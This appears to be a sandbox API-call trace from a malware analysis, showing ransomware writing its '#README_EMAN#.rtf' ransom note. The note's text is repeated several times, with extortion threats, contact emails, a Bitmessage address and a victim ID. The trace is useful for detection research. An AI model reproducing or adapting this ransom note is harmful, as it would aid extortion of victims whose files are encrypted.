m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0299.816] WriteFile (in: hFile=0x2f4, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0299.817] CloseHandle (hObject=0x2f4) returned 1 [0299.817] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Window.2\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\window.2\\#readme_eman#.rtf")) returned 0xffffffff [0299.817] GetLastError () returned 0x2 [0299.817] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Window.2\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\window.2\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 